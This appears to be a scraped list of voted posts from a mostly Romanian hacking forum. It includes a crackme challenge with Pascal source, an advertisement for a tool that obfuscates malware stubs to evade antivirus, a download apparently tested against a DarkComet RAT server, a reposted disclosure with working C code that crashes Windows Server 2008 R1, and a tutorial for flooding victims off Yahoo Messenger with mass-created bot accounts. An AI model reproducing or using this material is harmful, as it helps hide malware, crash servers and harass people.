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  1. sunt 3 rankuri: labar, curvar, violator sa va vad unde va incadrati trebuie sa gasiti parolele, nu aveti voie cu patchuri download: crckme.rar hall of cocks -tdxev a trecut de stagiul de labar
    1 point
  2. This amazing tool does FUD a source making a new stub and FUD with no dependencies on others every time you want it. Demostration Video: Video tutorial Features Wrote:General Options: [+] You can select with which files you want to work. [+] It works totally automatically. [+] You do not need to have Visual Basic Installed as it has a Compiler. [+] It works very fasts and complexes all code in less than 1 minute (Depending code long) [+] It FUDS Your tools and protects it agains crackers, As new generated code is totally unreadeable by debuggers [+] New generated codes are totally different beetween them, no one is similar to other, they are all UNIQUE. [+] If an AV gets one code you undetected with this tool, the others continue being undetected as they are UNIQUE. [+] It has a Plugins Folder, so, you can code your own tools for the program and personalizate it. [+] Tool will never be out of date as it is continuilly being updated, and if it does, however, you can code your own trashs simplily. Specific Options: [+] Api Obfuscating: It obfuscates API'S, And also names!! [+] String Encrypting: It encrypts ALL String with RANDOM key, they will be everytime different. [+] Add XOR Function: It adds automatically the Decryption Function [+] Add Trash Code: It adds Trash Code, which you can code using plugin folders or use default one. [+] Complex Code: It does RIP on code, I mean, It changes code order and redirects the coding, making it continuing working and redirectioning flows. [+] Trash Modules, Forms And Classes: It adds random new modules, Forms or Classes. [+] Trash Declarations: It adds Trash Main Declarations, which you can code new ones with plugins folder. [+] Trash Functions: It adds Trash Functions to project, which you can code new ones with plugin folder. [+] Trash Functions Optionals: It adds new options to the existing functions. [+] Randomize Function Names: It changes all Function Names to randomized strings. [+] Randomize Subs Names: It changes all Subs Names to randomized strings. [+] Randomize Project Info: It changes all Project Info to randomized strings. [+] Randomize Objects Names: It changes all module, forms and classes names to randomized strings. [+] Scramble Function Orders: It changes the order of the functions appearing in each module,form or class to randomized order. [+] Scramble Main Declarations: It changes the order of the main declarations appearing in each module, form or class to randomized order. [+] Scramble Sub Declaration Orders: It changes the order of each declaration in each function or sub appearing in each module, form or class to randomized order. [+] Don't Check for Repeated Keys: This might bug project, but tool will run faster. [+] Use Fast Replace: This rarely will bug project, but tool will run faster. [+] Don't Work with new Objects: This options disables working with the new trash modules, forms or classes. [+] Disable Random Work: This option will disable Random Work, this will make no important difference in Project. [+] Debug Mode: Ballon Showing Tips will inform you program running information when its working. [+] Compile: After a new stub has been generated it will automatically Compile It. [+]You can do a multi generating of Stubs, so you can use it as Stub Generator. and after the video : It seems a bit slow because the computer were slow with BBFlashBack Download
    1 point
  3. fluber, acea functie compara 2 stringuri. deci vezi de unde se apeleaza si ce se afla in eax si edx inainte sa se apeleze. cred ca ar fi mai bine sa dau codul sursa pt parolele 2 si 3, sa vad daca va descurcati dupa codul sursa. e mai lesne de invatat ceva in felul asta. deci parola 1 o descoperiti singuri, iar sursa pt parolele 2 si 3 este mai jos. MARE atentie la o mica chichita writeln('parola:'); readln(parola2); cat:=length(parola2); if cat<2 then goto label1; ok:=ord(parola2[cat-1])*2 div 5; contor:=0; i:=1; if (cat<>0) and (cat=ok) then while i<=cat do begin if (parola2[i]='â') then inc(contor); i:=i+2; end; if contor<>3 then goto gresit; writeln('curvar completed, mergem mai departe'); writeln('rank: violator ',chr(3),chr(6)); write('parola:'); readln(parola3); cat2:=length(parola3); if cat2<8 then goto gresit; suma:=0; for i:=1 to cat2 div 2 do suma:=suma+ord(parola3[i]); for j:=cat2 downto i+1 do suma:=suma+ord(parola3[j])*j; while suma<>0 do begin back:=suma mod 10; if integer(parola2[back])-48<>back then goto gresit; suma:=suma div 10; end; writeln('felicitari!'); writeln('iti recomand o bucata dintr-o arie dintr-o piesa: /watch?v=WahcTznCRm4'); goto sfarsit; gresit: writeln('mai trage un loz! (sau o loaza)'); sfarsit: readln; end. e cod in pascal, daca nu stiti gasiti pe cineva sa vi-l traduca in c++ sau alt limbaj de-l stiti. va astept cu parolele 2 si 3
    1 point
  4. Incurcasem eu borcanele am dat edit...
    1 point
  5. Pm pentru parola (cei cu mai putin de 300 de posturi sa se abtina) Download L-am testat pe un server de Darckomet (nu strica serveru') Inainte http://www.metascan-online.com/results Dupa http://www.metascan-online.com/results
    0 points
  6. Hi all. Here's a cute little local DoS attack against Windows Server 2008 R1, which will allow any user who can execute unprivileged code to BSoD your server with about three lines of C. I have reported this to Microsoft, but because of the limited scope of the issue - DoS-only, and server 2008 R1, as opposed to R2 - they declined to put out a security bulletin. Note that, as far as I can tell, upgrades from R1 to R2 are for-pay unless you bought R1 with Software Assurance originally, and additionally, that R2 does not support 32-bit hardware. I originally informed the vendor ten months ago, and their response was that, due to the DoS-only and R1-only circumstance, this problem "would be a candidate for inclusion in a future service pack update should one be released on the affected platforms". Perhaps naively, I then expected this to be fixed via a service pack, which has not transpired since then. Since the issue is so straightforward to reproduce (I refuse to believe that no-one else has found this), I have decided to disclose the issue publically in order to assist and remaining owners of 2008 R1 in securing their boxes. The best way to explain the issue is with an example exploit: int main(int argc, char *argv[]) { DWORD foo; char stuff[10]; CloseHandle(GetStdHandle(STD_OUTPUT_HANDLE )); CloseHandle(GetStdHandle(STD_ERROR_HANDLE )); ReadConsole(GetStdHandle( STD_INPUT_HANDLE ), stuff, 5, &foo, NULL); } Kapow - it's that simple. Close stdout and stderr, and read from stdin. Any of the other functions which do this can be used (cygwin, for example, can be used with it's standard C calls which eventually call CloseHandle). Anyway, if you run that on a server 2008 R1 box you will bluescreen! Further investigaion reveals a null deref in CSRSS: *** An Access Violation occurred in C:\Windows\system32\csrss.exe .. The instruction at 756DB6A1 tried to write to an invalid address, 0000000C eax=015c0da8 ebx=00000000 ecx=00000000 edx=015c14a8 esi=00000000 edi=015c0dc8 eip=756db6a1 esp=0083f5d0 ebp=0083f6a0 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 WARNING: Process directory table base 1F187040 doesn't match CR3 1F187360 001b:756db6a1 ff460c inc dword ptr [esi+0Ch] ds:0023:0000000c=???????? 756db6a1 ff460c inc dword ptr [esi+0Ch] 756db6a4 8b8d54ffffff mov ecx,dword ptr [ebp-0ACh] 756db6aa 898570ffffff mov dword ptr [ebp-90h],eax 756db6b0 8a8059010000 mov al,byte ptr [eax+159h] 756db6b6 8845b3 mov byte ptr [ebp-4Dh],al 756db6b9 8a471c mov al,byte ptr [edi+1Ch] 756db6bc 66834da4ff or word ptr [ebp-5Ch],0FFFFh 756db6c1 66834da6ff or word ptr [ebp-5Ah],0FFFFh ChildEBP RetAddr Args to Child 0083f6a0 756dbd5e 015c0dc8 015c0da8 002a0058 winsrv!ReadChars+0x3c2 0083f6f8 757359e4 015c0da8 0083f80c 945f0621 winsrv!SrvReadConsole+0x102 0083f86c 76f77ca3 00000000 7781fc7b 00000000 CSRSRV!CsrApiRequestThread+0x3b1 0083f8ac 76f9e489 75735633 00000000 ffffffff ntdll!__RtlUserThreadStart+0x35 0083f8c4 00000000 75735633 00000000 00000000 ntdll!_RtlUserThreadStart+0x1b Sample bugcheck output: *** STOP: 0x000000F4 (0x00000003, 0x84B92020, 0x84B9216C, 0x81C71A60) Confirmed vulnerable: * Windows server 2008 r1 Confirmed not vulnerable (some by MS, some by me): * Server 2008 r2 * Windows 7 * XP, 2003, 2003 r2 * Pretty much all the other MS OS's. Mitigation: I have no idea. If your environment allows it, do not enable users to run any user-supplied code (although if that's possible, then you've probably already taken steps to prevent this). Alternatively, upgrade to R2 (or, indeed, anything other that 2008 R1) if possible. If you are annoyed that this circumstance requires an upgrade, shout at MS. Microsoft supplied the following when asked if they were aware of any mitigations: "An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users." sursa: Windows Server 2008 R1 Local Denial of Service - BugSearch.net
    -1 points
  7. [+] Am vazut ca majoritatea userilor noi care apar pe forum cauta asta si am vazut ca mai este un topic in care toti scriu si nu le raspunde nimeni la intrebari si mai mult de atat buti nu sunt buni ceea ce ii face pe ei sa creada ca programul nu e bun. O sa fac eu sa zicem "tutorialul" acesta pentru userii care nu stiu ce au de facut. [+] Pentru inceput avem nevoie de o arhiva cu cateva "floodere" (sunt cele pe care le folosesc si eu ) Arhiva contine 3 foldere : - Flooderi - IR IDMakerV3.2 - Multi Yahoo Boots Checker La Flooderi sunt programele , La IR IDMaker V3.2 este un program cu care puteati realiza buti foarte usor ,si la Multi Yahoo Boots Checker se afla un program cu care puteti scana lista voastra de buti si sa salvati buti care mai merg si sa scapati de cei care numai merg. [+] Intrati la Flooderi si deschideti pe rand doar : -Big Killer Release -Fusion Ym v2 -GMC Booters Restul de 2 le lasati acolo pentru ca nu merg si mi-a fost lene sa le sterg..^^ La toate cele 3 programe o sa vedeti ca va apare Load la fiecare dintre ele. Dati la Load pe rand la fiecare si selectati fisierul .txt din folderul Flooderi numit dEv1L Boots buni. Faceti la fel la toate si dupaia dati la toate log in. Asteptati putin sa se incarce toate . O sa ia ceva timp sa se incarce..Nu mult.Cam 45 de secunde . Dupa ce s-au incarcat buti bagati idiul acolo la Victim si dati in felul urmator. La Big Killer Release dati Flood ,la Fusion Ym dati Fast YM Flood iar la Gmc booters dati Boot 1. Acum victima va fi scoasa de pe mess.Nu dureaza foarte mult ..depinde de viteza netului. [+]Cam asta e tot ca sa flodati pe cineva. [+]Ca sa creati buti faceti in felul urmator : Intrati in arhiva IR IDMakerV3.2 Intrati in IR IDMaker . Cand ati intrat in el bifati : -Random Boot name -Randomize Name and Lastname -Randomize information Si apasati butonul start. Acum v-a aparut codul captcha in dreapta pe care va trebui sa il scrieti in stanga butonului Create..Dupa fiecaredata cand scrieti codul apasati pe Create.Si un boot se va creea. Dupa dati Save si veti putea salva buti creati unde vreti. [+] Daca "tutorialul" meu v-a fost de ajutor apasati pe butonul REP de sub avatarul meu. Sper ca am fost de folos noilor membri care cautau asta.
    -1 points
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